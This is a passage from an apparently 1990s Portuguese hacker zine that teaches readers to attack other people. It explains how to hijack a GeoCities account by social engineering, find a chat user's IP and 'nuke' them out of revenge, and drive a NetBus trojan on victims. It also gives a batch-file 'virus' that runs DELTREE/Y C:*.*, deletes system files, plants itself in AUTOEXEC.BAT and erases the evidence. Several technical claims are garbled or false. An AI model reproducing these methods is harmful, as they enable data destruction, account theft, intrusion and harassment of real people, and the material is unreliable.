E OS NOMES DOS COMPTADORES ACESSADOS. PARA
LOCALIZAR DETERMINADO COMPUTADOR VOCÊ DIGITA O
SEU NÚMERO DE IP E A SEGUIR SEU NETBIOS, NA MESMA
LINHA, ESPARADO POR UM ESPAÇO. SE VOCÊ EXECUTAR
O PROGRAMA NBTSTAT –N, TERÁ A LISTA, COM O NOME E
O IP DE SEU COMPUTADOR, SEMPRE SENDO O PRIMEIRO
DA LISTA, SEGUIDO DAS OUTRAS MÁQUINAS
DISPONÍVEIS,TUDO NUMA JANELA DO DOS. ATRAVÉS DO
EXPLORER VOCÊ PODERÁ VER OS COMPUTADORES
DISPONÍVEIS NA REDE DOS QUAIS VOCÊ AINDA PODERÁ
UTILIZAR OS DISCOS MAPEANDO-OS, O QUE OS TORNARÁ
UNIDADES DE SEU COMPUTADOR.
COMO HACKEAR UMA PÁGINA DA GEOCITES?
É A COISA MAIS FÁCIL DO MUNDO...
ENTREI NA PÁGINA DE VÁRIAS PESSOAS E PENSEI
PORQUE ATÉ HOJE NÃO OUVI FALAR DE NINGUÉM QUE
TENHA HACKEADO UMA PÁGINA DA GEOCITES. VAMOS
DIRETO AO ASSUNTO:
ANOTE O MEMBER NAME DA PÁGINA DANDO UM SOUCE.
ANOTE O LUGAR QUE ESTA PÁGINA ESTÁ, POR EXEMPLO:
http://www.geocites.com/AUGUSTA/2000. LOGICAMENTE
VOCÊ SÓ VAI ANOTAR O DIRETÓRIO E O BLOCK.
AGORA VÁ ATÉ A PÁGINA PRINCIPAL DA GEOCITES E
CLIQUE NO LINK CONTACT GEOCITES, DEPOIS CLIQUE EM
SYSTEM PROBLEMS, E DEPOIS EM SYSTEM PROBLEMS
REPORTING FORM. LÁ VOCÊ VAI COLOCAR AS
INFORMAÇÕES NECESSÁRIAS, O DIRETÓRIO, ACIMA
CITADO, O BLOCK (ACONSELHO FAZER FOWARD) E NO
ESPAÇO ABAIXO VOCÊ VAI COLOCAR OPROBLEMA. DIGA
QUE AINDA NÃO RECEBEU SUA SENHA, EM INGLÊS:
"EXCUSE ME FOR THE UP SET, BUT I DIDN’T RECEIVE MY
SIGNAL".
PORRA! COMO É RIDÍCULO NÉ? AGORA É SÓ ESPERAR 3
OU 4 DIAS NO MÁXIMO QUE VOCÊ RECEBE SUA SENHA!
ASTREANDO IP PELO MS-DOS
TODO MUNDO TEM O MS-DOS INSTALADO EM SEU
COMPUTADOR, POR ISSO, QUASE NINGUÉM SABE QUE
TEM UM POTENTE RASTREADOR E IP EM SUA MÁQUINA.
MAS ANTES DE TUDO, O QUE É UM ENDEREÇO IP?
ENDEREÇO IP É UM NÚMERO QUE VOCÊ RECEBE QUANDO
SE CONECTA A UM SERVIDOR. UM EXEMPLODE SERVIDOR
DE IP É 200.200.200.200. OS TRÊS PRIMEIROS NÚMEROS
REPRESENTAM O DNS DE SEU SERVIDOR, E O ÚLTIMO
NÚMERO QUE VARIA. NO BRASIL, TODOS OS IP’S
COMEÇAM COM 200.
PARA RASTREAR, VOCÊ DEVE USAR UM PROGRAMA
CHAMADO ARP, PRESENTE NO DOS. O COMANDO QUE
DEVE SER DIGITADO É ARP -A. VOCÊ TERÁ UMA LISTA DE
ENDEREÇOS DE IP. MAS COMO SABER QUAL É O DA
PESSOA?? VOCÊ DEVE TER CERTEZA QUE A ÚLTIMA
INFORMAÇÃO QUE CHEGOU NO SEU MODEM VEIO DA
PESSOA QUE VOCÊ QUER SABER O IP. E DAÍ ENTRAR COM
O COMANDO NO MS-DOS. O IP DA PESSOA SERÁ O
PRIMEIRO.
TAMBÉM EXESTEM OUTROS PROGRAMAS COMO O
NETSTAT. COM ELE VOCÊ PODE RASTREAR QUAL É O
SERVODOR DA PESSOA E OUTROS. MAS ESSE PROGRAMA
É COMPLICADO E VOCÊ QUER SABER COMO USÁ-LO
DIGITE NETSTAT –H, E A TELA DE AJUDA APARECE. O QUE
FAZER COM O ENDERÇO DE IP? VOC~E PODE NUKAR A
PESSOA. O NUKE É IUM PROGRAMA QUE ENVIA UMA
MENSAGEM DE ERRO PELA PORTA 139, FAZENDO A
CONEXÃO DA VÍTIMA CAIR. VOCÊ TAMBÉM PODE INVADIR
O COMPUTADOR DA VÍTIMA USANDO O BACK ORIFICE OU
OUTRO PROGRAMA.
MANUAL DO NETBUS
HOST NAME/IP- COLOQUE O IP DA VÍTIMA.
PORT- COLOQUE 12345 CASO JÁ NÃO HAJA UMA
SELECIONADA.
IN INTERVAL, FUNCTION DELAY, MEMO E ABOUT- DEIXE
COMO ESTÁ.
ADD IP- CASO O IP SEJA FIXO, ADICIONE ELE EM UMA
LISTA.
DEL IP- DELETE O IP ADICIONADO ANTERIORMENTE.
CONNECT- ESTE É O BÁSICO, APÓS TER COLOCADO O IP
DA COBAIA, SE CONECTE.
SCAN- SCANEIA IP COM O PATCHE.
SERVER ADMIN- MUDA AS CONFIGURAÇÕES DO NET BUS
DA COBAIA. POSSUI ATÉ A OPÇÃO REMOVE A SERVER, OU
SEJA, REMOVE O PATCHE DO MICRO DELA.
OPEN CD ROOM- ABRE E FECHA O CD ROOM DA VÍTIMA
CONFORME VOCÊ CLIQUE.
SHOW IMAGE- VOCÊ DIGITA A URL DE UMA FOTO E ELA IRÁ
APARECER NO MICRO DA COBAIA.
SWAP MOUSE- FAZ COM QUE OS BOTÕES DO MOUSE SE
TROQUEM.
START PROGRAM- EXECUTA UM PROGRAMA NO MICRO DA
COBAIA.
MSG MANAGER- POSSIBILITA A VOCÊ MANDAR
MENSAGENS DE ERRO, EDITADAS POR VOCÊ. VOCÊ PODE
DEIXAR QUE ELA RESPONDA, OU NÃO...
SCREENDUMP- DARÁ UM PRINT SCREEEM, NA TELA DA
COBAIA, SALVANDO A IMAGEM DA COBAIA NO SEU
NETBUS.
GET INFO- DARÁ INFORMAÇÕES DA PESSOA, POR QUAL
ARQUIVO ELA ESTÁ INFECTADA, ETC.
PORT REDIRECT- MUDA A PORTA PELA QUAL VOCÊ
UTILIZA PARA CONECTAR, MUITO COMPLEXO, POIS
EXEISTEM POUCAS, MELHOR DEIXAR COMO ESTÁ.
PLAY SOUND- TOCARÁ UM SOM, QUE ESTÁ PRESENTE NO
MICRO DA COBAIA. COLOQUE A LINHA DE COMANDO.
EXIT WINDOWS- RESETAR A COBAIA, DESLIGAR DIRETO,
VOCÊ ESCOLHE.
SEND TEXT- SERVE PARA FALAR COM OUTROS
INVASORES, CASO HAJA ALGUM.
ACTIVE WNDS- VER AS JANELAS QUE ESTÃO ATIVAS NO
PC DA VÍTIMA. VOCÊ PODE ATIVAR, FECHAR OU ABRIR
QUALQUER JANELA.
APP REDIRECT- BESTEIRA
MOUSE POS- VOCÊ ESCOLHE UMA POSIÇÃO PARA O
MOUSE DELA FICAR. A COBAIA VAI FICAR LOUCA...
LISTEN- ESTA É UMA DAS MELHORES!! VOCÊ PODE VER O
QUE A PESSOA ESCREVE E ESCREVER PARA ELA (HE,
HE!). APROVEITE QUANDO A VÍTIMA ESTIVER FALANDO EM
CANAL ABERTO, PARA QUEIMAR O FILME DELA COM
FRASES CABULOSAS.
SOUND SYSTEM- SERVE PARA CONTROLAR O SISTEMA DE
SOM DA VÍTIMA. AUMENTE NO MÁXIMO E EXECUTE UMA
FILE WAVE!
SERVER SETUP- MUDA AS CONFIGURAÇÕES DO NET BUS
DA PESSOA.
CONTROL MOUSE- VOCÊ CONTROLA O MOUSE DA VÍTIMA.
GO TO URL- COLOQUE UMA HOME PAGE QUE VOCÊ
PREFERIR, OU ODIAR, PARA A COBAIA IR.
KEY MANAGER- ESTA TAMBÉM É MUITO MASSA! VOCÊ
PODE DESATIVAR TECLAS DO TECLADO DA PESSOA. É
MELHOR DESATIVAR ALGUMAS TECLAS, PRINCIPALMENTE
AS VOGAIS.
FILE MANAGER- ESSA MATA A PAU!!!VOCÊ TERÁ ACESSO
AO HD DA PESSOA E SUAS PARTIÇÕES! TUDO, TUDO
SEU!!!!!! PODENDO FAZER DOWNLOAD, UPLOAD, O QUE
QUISER! MAS LEMBRE-SE: ENTRE, OLHE, BRINQUE, MAIS
JAMAIS APAGUE!
O NUKE
HÁ MUITA CONFUSÃO NO AR A RESPEITO DO NUKE,
PRINCIPALMENTE DEPOIS DO SURGIMENTO DO WINNUKE.
SURGIRAM PROTEÇÕES E DETETORES, E MUITA GENTE SE
ESPANTA SOBRE O MOTIVO DE ELAS FUNCIONAREM EM
ALGUNS CASOS E EM OUTROS NÃO. INFELIZMENTE, ESSA
CONFUSÃO TEM ORIGEM MUITO SIMPLES: WINNUKE NÃO É
NUKE! VAMOS ANALIZAR CADA UMA DAS DUAS
TECNOLOGIAS COM PROFUNDIDADE SUFICIENTE PARA
DESFAZER ESTE EQUÍVOCO. INICIALMENTE,
APRESENTAREMOS UM TEXTO DE AUTORIA R.
O QUE É NUKE?
NUKE ÉO NEME ATRBUIDO A PROGRAMAS QUE FINALIZAM
PREMATURAMENTE COM UMA CONEXÃO TCP ATRAVÉS DO
ENVIO DE ICMP COM MENSAGENS DE ERRO. TAIS
PACOTES PODEM SER DIRECIONADAS PARA O SERVIDOR,
OU PARA O CLIENTE.
TAIS PROGRAMAS TEM A FINALIDADE DE TERMINAR COM A
CONEXÃO FAZENDO COM QUE O CLIENTE OU O SERVIDOR
SEJAM ENGANADOS POR UMA MENSAGEM DE ERRO QUE
NORMALMENTE INDICARIAM UM PROBLEMA DE CONEXÃO
ENTRE OS DOIS. O EFEITO DE TAL PROGRAMA PARA A
VÍTIMA É A DESCINEXÃO DO SEU SERVIDOR, GERALMENTE
SEM EFEITOS COLATERAIS. NUN EXEMPLO PRÁTICO SERIA
COMO SE VOCÊ FOSSE DESCONECTADO DO SERVIDOR DE
IRC.
HISTÓRICO
ACREDIT QUE O PRIMEIRO PROGRAMA NUKE FOI O
NUKE.C, PARA UNIX. SEU AUTOR SE CHAMAVA SATANIC
MECHANIC. ESTE PROGRAMA ENVIAVA PACOTES ICMP
COM MENSAGENS DE ERRO NA PORTA 23 DOSERVIDOR,
FINALIZANDO ASSIM COM CONEXÕES TELNET. COM A
CRIAÇÃO DE FIREWALLS, NUKES DIRECIONADOS AO
SERVIDOR PASSARAM A NÃO SER MAIS EFICIENTES.
PASSOU-SE ENTÃO A NUKAR O HOST DO CLIENTE, NO
ENTANTO, O FATO DO CLIENTE NÃO POSSUIR UMA PORTA
FIXA PARA FIXA PARA ESTABELECER CONEXÃO COM O
SERVIDOR DIFICULTA A OPERAÇÃO. A SOLUÇÃO PARA
ISSO FOI O DEESENVOLOVIMENTO DE PROGRAMAS QUE
VARREM SEQUENCIALMENTE TODAS AS PORTAS DO
CLIENTE AONDE PODE EXIXTIR UMA CONEXÃO (DE 1024 A
65535), BOMBARDEANDO ELAS COM MENSAGENS DE ERRO
ATÉ QUE SE ENCONTRE A PORTA ONDE SE DEU A
CONEXÃO COM O SERVIDOR.
O NÚMERO DE PROGRAMAS NUKING PARA UNIX SUPERA
EM MUITO OS EQUIVALENTES PARA WINDOWS, ALÉM DE
GERALMENTE SEREM MUITO MAIS EFICIENTES DEVIDO AS
LIMITAÇÕES DO WINSOCK. ALGUNS PROGRAMAS DE
NUKING DESENVOLVIDOS PARA O WINSOCK 2.2 JÁ ESTÃO
SENDO LANÇADOS, ESTES SIM MUITO MAIS PODEROSOS
DO QUE OS SEUS ANTECESSORES PARA A PLATAFORMA
MICROSOFT. ENTRE ESSES POSSO CITAR O CLICK4 QUE
REALMENTE É MUITO MAIS PODEROSO.
UM DOS PRIMEIROS PROGRAMAS NUKE PARA A
PLATAFORMAWINDOWS, FOI O WNUKE. É UM APLICATIVO
EM 16 BITS QUE UTILIZA OS RECURSOS DO TRUMPET
WINSOCK PARA ENVIAR OS PACOTES. FORAM LANÇADAS
DIVERSAS VERSÕES DESTE PROGRAMA, CADA UMA
IMPLEMENTANDO MAIS RECURSOS COMO CONTROLE DO
TIPO DE MENSAGEM ICMP ENVIADA E DELAY ENTRE O
ENVIO DOS PACOTES, DE FORMA QUE O PROGRAMA
PODERIA SER UTILIZADO POR PESSOAS QUE NÃO DISPÕE
DE UMA CONEXÃO DE ALTA VELOCIDADE COM A
INTERNET.
COMO EU UTILIZO O NUKE?
BASICAMENTE TODOS OS PROGRAMAS DE NUKE UTILIZAM
O MESMO PRINCÍPIO:
DEFINIR O ALVO DOS PACOTES;
DEFINIR O HOST DO CLIENTE;
DEFINIR O HOST DO SERVIDOR;
DEFINIR AS PORTAS A SEREM NUKADAS NO CLIENTE;
DEFINIR AS PRTAS A SEREM NUKADAS NO SERVIDOR;
DEFINIR O INTERVALO ENTRE OS PACOTES ENVIADOS;
UMA VEZ DETERMINADOS ESSES PARÂMETROS O
PROGRAMA INICIA O ENVIO DE PACOTES DE ERRO.
QUANTO MAIS RÁPIDA FOR A SUA CONEXÃO COM A
INTERNET, MAIS RÁPIDO SERÁ O ENVIO DOS PACOTES, E
MAIS RÁPIDO A VÍTIMA SERÁ ATINGIDA. NO LUGAR DA
PORTA DO SERVIDOR, O MAIS ÓBVIO É COMEÇAR A
VARREDURA A PARTIR DA PORTA 6667, QUE É A PORTA
DEFALT PARA A MAIORIA DOS SERVIDORES DE IRC.
O TIPO DE MENSAGEM DE ERRO ENVIADA PODE SER
DETERMINADA PREFERENCIALMENTE PELO TIPO DE ALVO.
SE O ALVO FOR UMA MÁQUINA UNIX, MENSAGENS DE
HOST UNREACHABLE DEMONSTRAM MAIOR EFICIÊNCIA.
NO CASO DE MÁQUINA WINDOWS, "PROTOCOL
UNREACHEBLE" DEMONSTROU SE MAIS EFICIENTE.
OOB: O BUG DA PORTA 139
DIVERSOS PROGRAMAS UTILIZAM ESSE BUG PARA
TRAVAR SISTEMAS WINDOWS, GERANDO DoS ATRAVÉS
DO ENVIO DE UM PACOTE OOB (OUT FO BAND) MARCADO
COMO URGENTE PARA AS PORTAS ESPECÍFICAS, COMO
POR EXEMPLO A PORTA 139. SISTEMAS WINDOWS NT SEM
O HOTFIX.
OOBFIX INSTALADO AINDA NÃO AFETADOS EM DUAS
OUTRAS PORTAS. APESAR DE SEREM CHAMADOS DE
NUKE, NA VERDADE ESSES PREGRAMAS TEM
FUNCIONAMENTO TOTALMENTE DIFERENTE, ELES APENAS
SE APROVEITAM DE UMA FALHA DO SISTEMA.
CONFORME DESCRITO EM SEÇÕES ANTERIORES, O
FUNCIONAMENTO DE PROGRAMAS NULE É DIFERENTE. OS
EFEITOS DE UM PROGRAMA DE OOB SÃO FACILMENTE
PERCEPTÍVEIS. TODO O SISTEMA DE REDE DO WINDOWS
ENTRA EM PÂNICO E GERALMENTE É NECESSÁRIA A
REINICIALIZAÇÃO DO SISTEMA PARA QUE A SITUAÇÃO
SEJA NORMALIZADA. FELIZMENTE JÁ EXISTEM DIVERSOS
PATCHES DISPONÍVEIS PARA RESOLVER ESTE PROBLEMA.
PINGA BOOM
INICIALMENTE VALE EXPLICAR QUE NÃO ESTAMOS
FALANDE DE CTCP PING, E SIM DO PROGRAMA PING QUE
VERIFICA SE UM ENDEREÇO DE IP EXISTE E ESTÁ
ACESSÍVEL. O MAU USO INTENCIONADO DESTE
PROGRAMA, A PARTIR DE UMA CONEXÃO RÁPIDA COM A
REDE FAZ COM QUE A VÍTIMA CAIA NUM LAG QUE
PROVAVELMENTE O LEVARÁ A DESCONEXÃO POR PING
TIMEOUT, DEVIDO A QUANTIDADE DE PACOTES
RECEBIDOS SUPERAR EM MUITO A CAPACIDADE DE
ESSES MESMOS SEREM DESENVOLVIDOS.
WINNUKE
UM BUG DO SUBSISTEMA DE REDE DO UNIX 3.X,M 95 E NT
PERMITE QUE USUÁRIOS EXTERNOS POSSAM DESATIVAR
TOTALMENTE O SEU ACESSO À REDE, SIMPLESMENTE
ENVIANDO INFORMAÇÕES MARCADAS COMO URGENTES A
DETERMINADAS PORTAS DO SEU COMPUTADOR (SENDO
QUE A MAIS USUAL É A 139). ESSE ATAQUE DE DoS
DESABILTA TOTAÇMENTE A COMUNICAÇÃO TCP/IP DA SUA
MÁQUINA RETORNANDO AO NORMAL APENAS APÓS O
REBOOT DA SUA MÁQUINA. EXISTEM PROTEÇÕES
DISPONÍVEIS QUE SIMPLESMENTE FECHAM A PORTA 139.
ISSO NÃO É EFICENTE, POIS O ATAQUE OOB PODE SER
EXECUTADO EM OUTRAS PORTAS MENOS USUAIS
TAMBÉM. DA MESMA FORMA, OS DETETORES DE QUE SE
DESTINAM A IDENTIFICAR A ORIGEM DOS ATAQUES DE
OOB TAMBÉM NÃO TEM EFICIÊNCIA MÁXIMA PORQUE
LIMITAM-SE A OUVIR A PORTA 139. ALÉM DISSO, ELES NÃO
DEVERIAM CHAMAR-SE DETECTORES DE NUKE, UMA VEZ
QUE O ATAQUE QUE ELES DETECTAM NÃO CONSTITUI UM
NUKE CANÔNICO, MAS APENAS UM EXPLOIT DE UM BUG
DO MICROSOFT WINSOCK.
PEGANDO O IP DE ALGUÉM EM UMA SALA DE CHAT
JÁ DEVE TER ACONTECIDO COM VOCÊ DE ESTAR EM UM
CHAT DE WWW E ALGUÉM TE XINGAR. XINGAR NÃO
RESOLVE, APENAS MANTÉM A BRIGA. MAS QUE TAL SE
VINGAR COM UM POUCO MAIS DE CLASSE? SERIA UMA
BOA HEIN? QUE TAL NUKAR O OTÁRIO OU ENTRAR EM NO
SERVER DE IP DELE, PEGAR UM A SENHA E AMEAÇÁ-LO?
ISSO SIM QUE É ESTILO! COM UM RASTREADOR DE IP E
ALGUNS PROGRAMINHAS VOCÊ PODERÁ FODER LEGAL.
PEGAR O IP DE ALGUÉM EM UMA SALA QUE NÃO ACEITE
TAGS HTML É MAIS FÁCIL DO QUE PEGAR IP EM SALA QUE
ACEITE TAGS DE HTML. O TRUQUE É SIMPLES: VÁ AO
PROMPT DO MS DOS E DIGITE ARP –A. COM ISSO IRÁ
APARECER UM MONTE DE IP’S. O PRIMEIRO IP É O SEU EO
ÚLTIMO DA PESSOA QUE TE MANDOU A ÚLTIMA
MENSAGEM. VAMOS SUPOR QUE O RICK TE MANDOU UMA
MENSAGEM. DAÍ VOCÊ RESOLVE PEGAR O IP DELE, E VAI
AO E DIGITA ARP –A. O ÚLTIMO IP DA LISTA É O IP DO RICK.
PRONTO, AGORA VOCÊ JÁ TEM O IP PROMPT DO MSDOS
DO CARA. É SÓ PEGAR UM PROGRAMA NUKE E DERRUBAR
O OTÁRIO.
OS VÍRUS
OS VÍRUS PODEM SER CCATALOGADOS EM TRÊS
CATEGORIAS BÁSICAS:
VÍRUS DE BOOT: OS VÍRUS DE BOOT SÃO TRANSMITIDOS
BASICAMENTE POR DISQUETES, COPIANDO-SE PARA O
SERTOR BOOT (O GRUPO DE INSTRUÇÕES QUE O
COMPUTADOR LÊ QUANDO É LIGADO). JÁ TIVERAM O SEU
ALGE DA FAMA, MAS HOJE ESTÃO CADA VEZ MAIS RAROS.
VÍRUS EXECUTÁVEIS: TAMBÉM CONHECIDOS COMO VÍRUS
DE ARQUIVOS ESTES PROGRAMAS SE ANEXAM AO
CÓDIGO EXECUTÁVEL DE OUTROS PROGRAMAS,
PRINCIPALMENTE OS QUE TEM A TERMINAÇÃO .EXE OU
.COM. QUANDO UM PROGRAMA INFECTADO É
EXECUTADO, O VÍRUS VAI PARA A MEMÓRIA DO
COMPUTADOR E LÁ INFECTA OUTROS PROGRAMAS,
EXECUTADOS POSTERIORMENTE.
VÍRUS DE MACRO: ESTES VÍRUS ATACAM ARQUIVOS DE
GABARITOS (TEMPLATES) DO MICROSOFT OFFICE,
PRINCIPALMENTE OS ARQUIVOS NORMAL .DOT. A PARTIR
DESTA CONTAMINAÇÃO. TODO O DOCUMENTO CRIADO
POSSUIRÁ VÍRUS DENTRO DELE, E ESTE É UMA RAZÃO
PELA QUAL ESSA CATEGORIA DE VÍRUS PE A MAIS
DIFUNDIDA ATUALMENTE. A OUTRA É A RAZÃO DE SER
MUITO FÁCIL PROGRAMAR EM VBA DO QUE LINGUAGEM
COMO ASSEMBLER OU C++ UTILIZADA PELOS
PROGRAMADORES DE VÍRUS EXECUTÁVEIS.
UMA BOA ESTRATÉGIA DE SEGURANÇA É MANTER A
OPÇÃO DE PROTEÇÃO CONTRA VÍRUS HABILITADA NO
WORD. ESTA OPÇÃO ESTÁ ABILITADA NO MENU
FERRAMENTAS/OPÇÕES/GERAL/ATIVAR PROTEÇÃO
CONRA VÍRUS DE MACRO. ASSIM, SEMPRE QUE ALGUM
ARQUIVO COM MACROS FOR ABERTO, EXISTIRÁ UMA
OPÇÃO DE DESABILIITAR O SEU CARREGAMENTO.
FAZER VÍRUS
AGORA VOCÊ APRENDERÁ COMO FAZER ALGUNS TIPOS
DE VÍRUS "SIMPLES". VÍRUS MAIS COMPLEXOS, EXIGEM
CONHECIMENTOS DE PROGRAMAÇÃO. EM PRIMEIRO
LUGAR VOCÊ DEVE LOCALIZAR O ARQUIVO EDIT.COM NA
PASTA C:WINDOWSCOMMAND. COM O ARQUIVO
ENCONTRADO, COPIE –O PARA UM DISQUETE E ABRA-O.
IRÁ APARECER UMA TELA AZUL. É UM EDITOR COM
POUCOS RECURSOS. ENTÃO DIGITE:
@ECHO OFF
BREAK OFF
DEPOIS DISSO, VOCÊ ESCOLHE O TIPO DE VÍRUS QUE
QUER FAZER.
VAMOS SUPOR QUE O VÍRUS IRÁ APAGAR TODOS OS
ARQUIVOS DO PC ALHEIO. VOCÊ DEVE USAR OS
SEGUINTES COMANDOS:
DELTREE/Y C:*.*
CASO QUEIRA QUE APAGUE OS ARQUIVOS DE SISTEMA,
USE OS SEGUINTES COMANDOS:
DEL C:AUTOEXEC.BAT
DEL C:COMMAND.COM
DEL C:CONFIG.SYS
É UMA QUESTÃO DE LÓGICA. USE A LÓGICA PARA CRIAR
OS SEUS VÍRUS E PARA QUE ELES FAÇAM O QUE VOCÊ
QUEIRA. DEPOIS USE O COMANDO COPY (NOME DO
VÍRUS).BAT AUTOEXEC.BAT, ELA ENTÃO TERÁ A CERTEZA
DE ESTAR EXECUTANDO O SEU VÍRUS AO INICIAR O
COMPUTADOR ALVO.
DEPOIS DE TUDO, SALVE O VPIRUS COM A EXTENSÃO
.BAT, DE FORMA QUE FIQUE: OQUEQUISER.BAT. AGORA O
SEU VÍRUS ESTÁ PRONTO, BASTA SER EXECUTADO E O
VÍRUS IRÁ TOMAR AS PROVIDÊNCIAS NECESSÁRIAS.
IMPORTANTE: CASO FOR PASSAR ESSE VÍRUS VIA
DISQUETE, VOCÊ NÃO DEVE ESQUECER DE FINALIZAR O
ARQUIVO COM O COMANDO DELTREE/Y A:*.*. ISSO SERVE
PARA NÃO DEIXAR VESTÍGIO DO SEU ATO INSANO.
TELNET
É O PROTOCOLO INTERNET PARA ESTABELECER
CONEXÃO ENTRE COMPUTADORES. ATRAVÉS DESSA
CONEXÃO REMOTA, PODE-SE EXECUTAR PROGRAMAS E
COMANDOS EM OUTRA MÁQUINA, COMO SE O TECLADO
DE SEU COMPUTADOR ESTIVESSE LIGADO DIRETAMENTE
A ELA. O VISUAL DE UMA CONEXÃO VIA TELNET É
SEMELHANTE AO QUE SE TEM EM BBS’S DE INTERFACE
DOS. E A OPERAÇÃO DO COMPUTADOR REMOTO SE DÁ DA
MESMA FORMA, OU SEJA, ATRAVÉS DE UMA LINHA DE
COMANDOS UNIX OU A PARTIR DE UM MENU DE
COMANDOS DISPONÍVEIS QUE SEMPRE SE APRESENTA EM
ALGUM LUGAR DA TELA (ESTA ÚLTIMA É A MAIS COMUM
ESTRE SERVIDORES QUE PERMITEM ACESSO AO
PÚBLICO). O TELNET PODE SER USADO PARA A PESQUISA
DE INFORMAÇÕES E TRANFERÊNCIA DE ARQUIVOS –
TUDO DEPENDE DO QUE O COMPUTADOR VOCÊ ESTÁ
CONECTADO PERMITIR QUE VOCÊ FAÇA. ELE TAMBÉM É
MUITO USADO POR OPERADORES DE SISTEMAS (SYSOPS)
A FIM DE FAZER ALGUM TIPO DE MANUTENÇÃO (SE VOCÊ
PENSA QUE O SYSOP DE SEU PROVEDOR SAI DE CASA
TODA VEZ QUE TEM ALGUM PROBLEMA NOS SERVIDORES,
ESTÁ MUITO ENGANADO. MUITAS VEZES ELE FAZ A
MANUTENÇÃO DE CASA MESMO, VIA TELNET.
PARA FAZER UMA CONEXÃO VIA TELNET É NECESSÁRIO
UM PROGRAMA ESPECÍFICO. O WINDOWS 95 JÁ VEM COM
UM.
CONECTANDO-SE VIA TELNET: INICIE O TELNET QUE FICA
NA PASTA WINDOWS, CLIQUE EM CONECTA, SISTEMA
REMOTO E DIGITE NA CAIXA NOME DO HOST O ENDEREÇO
AO QUAL DESEJA CONECTAR-SE. NAS CAIXAS "PORTA" E
"TIPO DO TERMINAL" SELECIONE TELNET VT100. FEITO
ISSO, CLIQUE NO BOTÃO CONECT. ISSO INICIARÁ A
CONEXÃO COM O COMPUTADOR REMOTO.
FREQUENTEMENTE, AO FINALIZAR A CONEXÃO, O
SISTEMA REMOTO PEDE UMA SENHA. DIGITE "GUEST" E
APERTE ENTER. ISTO ABRIRÁ AS PORTAS DO
COMPUTADOR REMOTO PARA VOCÊ. NA TELA SURGE UMA
SÉRIE DE OPÇÕES, PRECEDIDAS DE UM NÚMERO OU
LETRA. PARA EXECUTAR ALGUNS DESTES COMANDOS,
DIGITE ALGUM DESSES NÚMEROS OU LETRAS E APERTE
ENTER. EXPLORE O SISTEMA AO QUAL VOÊ CONECTOU
PARA EXERCITAR.
COMANDOS BÁSICOS DE UNIX: A MAIORIA DOS
SERVIDORES NÃO PERMITE ACESSO AO PÚBLICO VIA
TELNET, PORQUE ESSA É A PRINCIPAL PORTA DE
ENTRADA PARA HACKERS. NESTES SERVIDORES NÃO SE
ENCONTRAM MENUS QUE FACILITAM A NAVEGAÇÃO PELO
SITE OU MENUS DE QUALQUER TIPO, O QUE LEVA A
NECESSIDADE DE CONHCER ALGUNS COMANDOS
BÁSICOS DE UNIX. SE VOCÊ É WEBMASTER, MUITAS
VEZES VAI TER ACESSSO A PROVEDORES DE PRESENÇA,
DE FTP E EM ALGUNS CASOS TELNET, PARA EFETUAR
ALGUMAS OPERAÇÕES QUE O FTP NÃO PERMITE. SEGUE
ABAIXO UMA LISTA QUE LHE SERÃO MUUITO ÚTEIS NESTE
CASO:
LS –L: LISTA OS ARQUIVOS DE UM DIRETÓRIO
LS –AL: LISTA TODOS OS ARQUIVOS DE UM DIRETÓRIO,
INCLUSIVE OS HIDDEN
CP X Y: COPIA UM ARQUIVO DO DIRETÓRIO X PARA O
DIRETÓRIO Y
MV XY: MOVE O ARQUIVO DO DIRETÓRIO X PARA O
DIRETÓRIOY
RM X: DELETA O ARQUIVO X
CD XXX: MUDA O DIRETÓRIO ATIVO PARA XXX
CD..: SAI DE UM DIRETÓRIO
MKDIR XXX: CRIA O DIRETÓRIO XXX DENTRI DO DIRETÓRIO
ATUAL
RM XXX: REMOVE O DIREÓRIO XXX
OS PROTOCOLOS TCP/IP
PARA ENTENDER COMO ATAQUES FUNCIONAM, É
NECESSÁRIO TER UMA PEQUENA NOÇÃO DE COMO
TRABALHA A INTERNET, OU PELO MENOS COMO
FUNCIONA A SUA BASE DE PROTOCOLOS DE
COMUNICAÇÃO. ESTA FAMÍLIA DE PROTOCOLOS É
CHAMADA TCP/IP. COMO SABEMOS, CADA COMPUTADOR
LIGADO À INTERNET É IDENTIFICADO POR UM NÚMERO DE
IP. A MAIORIA DAS PESSOAS CONECTADAS NÃO TEM UM
NÚMERO DE IP FIXO, CADA VEZ QUE SE CONECTAM AO
PROVEDOR RECEBEM UM NOVO NÚMERO DE IP. APESAR
DE UM IP SER UTILIZADO PARA IDENTIFICAR UMA
MÁQUINA DENTRE MILHÕES CONECTADAS A INTERNET,
ELE NÃO É SUFICIENTE PARA QUE ESTA MÁQUINA
TROQUE INFORMAÇÕES COM OUTRAS. POR EXEMPLO,UM
MESMO ENDEREÇO DE IP 200.230.137.4 PODE SER
UTILIZADO TANTO PARA CONEXÕES VIA WWW, IRC E FTP.
COMO UM CLIENTE DE WWW PEDE UM SERVIÇO PARA
ELE? E COMO A MÁQUINA 200.230.137.4 DIFERENCIA SEUS
DIVERSOS SEVIÇOS OFERECIDOS À INTERNET? É AÍ QUE
SURGE UM IMPORTANTE CONCEITO, MUITAS VEZES
NEGLIGENCIADO PELOS USUÁRIOS, MAIS É VITAL PARA
PREENCHER OS VÁRIOS TIPOS DE ATAQUES DE
CRACKERS, QUE É O DA "PORTA". AGORA, ALÉM DE
DIFERENCIARMOS AS MÁQUINAS DA INTERNET, PODEMOS
IDENTIFICAR OS SERVIÇOS QUE ELAS PRESTAM, E CADA
UM DELES É IDENTIFICADO COM UM NÚMERO DIFERENTE.
ESTES NÚMEROS SÃO PADRONIZADOS, PARA EVITARMOS
CONFUSÃO. POR EXEMPLO, PARA UTILIZAR O SERVIÇO DE
WWW DA NOSSA MÁQUINA 200.230.137.4, BASTA
ABRIRMOS UMA CONEXÃO PELA PORTA 80. O FTP UTILIZA
A PORTA 21, O ICQ USA PORTAS NA FAIXA 1000-2000, E IRC
PORTAS 6666, 6667, 6668. EXISTEM CERCA DE 65535
NÚMEROS DISPONÍVEIS PARA SEREM UTILIZADOS EM UMA
ÚNICA MÁQUINA. QUANTO MAIS SERVIÇOS A MÁQUINA
OFERECE, MAIS PORTAS (E SEUS NÚMEROS) SÃO
DISPONIBILIZADOS. ATÉ MESMO A SUA MÁQUINA
WINDOWS 95/98, QUE APARENTEMENTE NÃO OFERECE
SERVIÇO NENHUM, TEM PORTAS ABERTAS.
A COLETA DE DADOS
UM ATAQUE BEM SUCEDIDO A UM COMPUTADOR É
AQUELE QUE EXPLORA A VULNERABILIDADE EXISTENTE
EM UM PROGRAMA OU SERVIÇO RODANDO NA MÁQUINA.
